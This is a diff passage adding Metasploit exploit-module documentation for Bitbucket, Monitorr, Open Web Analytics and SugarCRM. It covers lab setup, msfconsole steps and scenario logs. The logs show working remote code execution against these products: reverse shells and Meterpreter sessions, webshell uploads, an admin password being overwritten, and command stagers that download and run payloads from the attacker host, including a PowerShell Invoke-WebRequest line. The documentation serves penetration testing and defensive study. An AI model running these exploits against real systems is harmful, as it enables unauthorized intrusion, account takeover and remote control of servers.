+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990. If installing an 8.* version of Bitbucket, you will need to create
+a `bitbucket.properties` file at `/var/atlassian/application-data/bitbucket/shared`. Once created,
+add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
+4. Do: `set USERNAME <username>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `set RHOST <target_ip>`
+7. Do: `set LHOST <listen_ip>`
+8. Do: `run`
+9. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Username to authenticate with and has at least admin privileges
+
+### PASSWORD
+
+Password to authenticate with
+
+## Scenarios
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, CMD Target
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username test
+username => test
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password password
+password => password
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'fjNMKiB'
+[+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
+[*] Sending payload
+[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:41118) at 2023-03-13 14:04:00 -0500
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+uname -a
+Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, Linux Dropper
+
+```
+msf6 exploit(multi/http/bitbucket_env_var_rce) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+    0   Linux Command
+=>  1   Linux Dropper
+    2   Windows Dropper
+
+
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'gmoQNc'
+[+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/VtgFQ7yCgjcP
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /VtgFQ7yCgjcP
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  53.04% done (61/115 bytes)
+[*] Command Stager progress -  72.17% done (83/115 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:50632) at 2023-03-13 14:06:18 -0500
+[*] Command Stager progress -  83.48% done (96/115 bytes)
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```
+
+### Windows 10, x64 - Bitbucket `v7.18.1`, Windows Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
+rhost => 192.168.140.171
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
+username => admin
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
+password => P@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found version 7.18.1 of Bitbucket
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Retrieving security token
+[*] Project creation was successful
+[+] Successfully created repository 'GqFji'
+[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
+[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
+[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
+[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Command Stager progress -  75.19% done (97/129 bytes)
+[*] Sending stage (175686 bytes) to 192.168.140.171
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
+[*] Command Stager progress -  86.05% done (111/129 bytes)
+[*] Command Stager progress - 100.00% done (129/129 bytes)
+[*] Changing user name back to 'admin'
+[*] Attempting to delete repository 'GqFji'
+[+] Repository has been deleted
+[*] Now attempting to delete project 'eTzDRa'
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: DESKTOP-5JSUGC8\atlbitbucket
+meterpreter > sysinfo
+Computer        : DESKTOP-5JSUGC8
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x86/windows
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v8.4.0` with mesh.enabled set to false, Linux Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
+username => administrator
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
+password => S3cureP@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Versions 8.* are vulnerable only if the mesh setting is disabled
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'IuNYsZZPl'
+[+] Commits added: 560d760fdcbcf210c2c1b6dd04663381002066e5, 53ada0136f82899451c16a00cb939225dba53336
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/qt9f0M
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /qt9f0M
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  50.46% done (55/109 bytes)
+[*] Command Stager progress -  70.64% done (77/109 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 10 opened (192.168.140.1:4444 -> 192.168.140.149:43360) at 2023-03-14 19:00:00 -0500
+[*] Command Stager progress -  82.57% done (90/109 bytes)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Changing user name back to 'administrator'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```
@@ -0,0 +1,231 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file upload vulnerability (CVE-2020-28871) that results into an RCE in Monitorr,
+a web application that allows you to setup a dashboard to monitor various web site/web application up or down state.
+All versions including `v1.7.6m` and latest development release `v1.7.7d` are vulnerable and no patch is available.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with
+embedded PHP code to the `assets/data/usrimg` (Linux) or `assets\data\usrimg` (Windows) directory on the web server
+using the vulnerable endpoint `/assets/php/upload.php`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious `GIF` file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication and any remote attacker can exploit this vulnerability to gain
+access to the underlying operating system as the user under which the web services are running (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable Monitorr software loaded.
+Follow instructions [Monitorr Install](https://github.com/Monitorr/Monitorr/wiki/01-Config:--Initial-configuration),
+to install the Monitorr application either on Linux or Windows.
+
+This module has been tested against a Monitorr installation with the specifications listed below:
+
+* Monitorr
+* Version: `1.7.6m`
+* Linux OS: Ubuntu 22.04
+* Windows OS: Windows Data Center 2019
+
+## Verification Steps
+
+1. `use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper, 3-Windows command, or 4-Windows Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > options
+Module options (exploit/multi/http/monitorr_webshell_rce_cve_2020_28871):
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+   When TARGET is not 0:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  1981             yes       The local port to listen on.
+Payload options (php/meterpreter/reverse_tcp):
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+Exploit target:
+   Id  Name
+   --  ----
+   0   PHP
+View the full module info with the info, or info -d command.
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.34
+rhosts => 192.168.201.34
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lhost 192.168.201.10
+lhost => 192.168.201.10
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 0
+target => 0
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.34
+[+] Deleted tsrezgkjwmtxyj.php
+[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.34:54680) at 2023-03-13 16:14:32 +0000
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - bash reverse shell
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 1
+target => 1
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted jzcjawsk.php
+[*] Command shell session 2 opened (192.168.201.10:4444 -> 192.168.201.34:58348) at 2023-03-13 16:16:06 +0000
+
+uname -a
+Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - Linux Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 2
+target => 2
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/nAtmJo
+[*] Client 192.168.201.34 (Wget/1.21.2) requested /nAtmJo
+[*] Sending payload to 192.168.201.34 (Wget/1.21.2)
+[*] Sending stage (3045348 bytes) to 192.168.201.34
+[+] Deleted ebdzghdq.php
+[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.34:32922) at 2023-03-13 16:17:05 +0000
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.34
+OS           : Ubuntu 22.04 (Linux 5.15.0-60-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Powershell Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.36
+rhosts => 192.168.201.36
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
+[+] 192.168.201.36:80 - The target is vulnerable. Monitorr version: 1.7.6m
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 3
+target => 3
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
+[*] Sending stage (175686 bytes) to 192.168.201.36
+[+] Deleted dkvszuqil.php
+[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.36:54805) at 2023-03-13 16:18:53 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Windows Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 4
+target => 4
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/EEFxVaRHZLJZNrF
+[*] Client 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /EEFxVaRHZLJZNrF
+[*] Sending payload to 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (200774 bytes) to 192.168.201.36
+[+] Deleted zyrkwyinvjnzr.php
+[*] Meterpreter session 5 opened (192.168.201.10:4444 -> 192.168.201.36:54882) at 2023-03-13 16:19:52 +0000
+[*] Command Stager progress - 100.00% done (155/155 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations identified.
@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated
+remote attacker to obtain sensitive user information, which can be
+used to gain admin privileges by leveraging cache hashes. This occurs
+because files generated with '<?php (instead of the intended "<?php sequence) aren't
+handled by the PHP interpreter.
+
+## Verification Steps
+
+1. Start a vulnerable instance of OWA using docker
+    - Download https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
+    - Start the containers: `docker compose up -d`
+    - Open http://127.0.0.1:80/
+    - Follow installation steps using the envs from the `docker-compose.yml` file
+        - Public URL: `http://127.0.0.1/`
+        - Database Host (`docker inspect <db-container>` and get `IPAddress`, e.g `172.22.0.2`)
+        - Database Port: `3306`
+        - Database Name: `owa`
+        - Database User: `owa`
+        - Database Password: `Demo12+#`
+        - Continue
+        - Site Domain: `http://127.0.0.1`
+        - Admin name: `admin`
+        - E-Mail: `admin@admin.com`
+        - Password: `Demo12+#`
+        - Continue
+
+2. Start `msfconsole`
+3. `use exploit/multi/http/open_web_analytics_rce`
+4. `set RHOSTS 127.0.0.1`
+5. `set RPORT 80`
+6. `set SSL false`
+7. `set LHOST 172.22.0.1` -> this needs to be bridge IP that got created with the `docker compose up -d` command
+8. `check`
+9. `run`
+
+## Options
+### Password
+
+When exploiting the target, the password of the attacked user will be overwritten with this password.
+
+### Username
+
+The user that will be targeted with this exploit.
+
+## Advanced Options
+### SearchLimit
+
+The exploit works by retrieving a `temp_passkey` value from a cache file that gets created for each user when trying to login with it.
+Since the `/owa-data/caches/` directory is publicly accessible, we can retrieve these cache files. The exact path for the cache files
+depends on the `user_id` and can get calculated with that. This option defines how many calculated paths, starting from 0, should be
+checked for cache files with the `temp_passkey` value in it.
+
+## Scenarios
+### Version 1.7.3 using docker deployment from above
+```
+msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
+LHOST => 172.22.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > run
+
+[*] Started reverse TCP handler on 172.22.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
+[+] Connected to http://127.0.0.1/ successfully!
+[*] Attempting to find cache of 'admin' user
+[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
+[+] Changed the password of 'admin' to 'pwned'
+[+] Logged in as admin user
+[*] Creating log file
+[+] Wrote payload to file
+[*] Sending stage (39927 bytes) to 172.22.0.3
+[+] Deleted QY0yivK4.php
+[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
+[+] Triggering payload! Check your listener!
+
+meterpreter > pwd
+/var/www/html/owa-data/caches
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
@@ -0,0 +1,195 @@
+## Vulnerable Application
+
+This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,
+Professional, Sell, Serve, and Ultimate versions prior to `11.0.5` and SugarCRM 12.0 Enterprise, Sell, and
+Serve versions prior to `12.0.2`.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `PNG` file with
+embedded PHP code to the `/cache/images/` directory on the web server using the vulnerable endpoint
+`/index.php?module=EmailTemplates&action=AttachFiles`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication because there is a missing authentication check in the
+`loadUser()` method in `include/MVC/SugarApplication.php`. After a failed login, the session does not get
+destroyed and hence the attacker can continue to send valid requests to the application. See this
+[AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) for more details.
+
+Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain
+access to the underlying operating system as the user that the web services are running as (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux machine with the vulnerable SugarCRM software loaded.
+Follow instructions [here](https://support.sugarcrm.com/Documentation/Sugar_Versions/11.0/Ent/Installation_and_Upgrade_Guide/),
+but you need to be registered as a sugarcrm customer in order to access the software.
+This module has been tested against a SugarCRM installation with the specifications listed below:
+
+* SugarCRM Enterprise Edition
+* Version: `11.0.4`
+* Build: `300`
+* Linux OS: Debian 8.6
+
+## Verification Steps
+
+1. `use exploit/multi/http/sugarcrm_webshell_cve_2023_22952`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/sugarcrm_webshell_cve_2023_22952
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > options
+
+Module options (exploit/multi/http/sugarcrm_webshell_cve_2023_22952):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+
+
+   When TARGET is not 0:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 0
+target => 0
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.100.180
+[+] Deleted cXSbMSaTtcnn.phtml
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-02-15 14:11:23 +0000
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Meterpreter  : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - bash reverse shell
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 1
+target => 1
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted RPXrYGLCvGjL.phar
+[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
+
+whoami
+www-data
+exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - Linux Meterpreter session
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 2
+target => 2
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.100.254:8080/aLYDt2
+[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
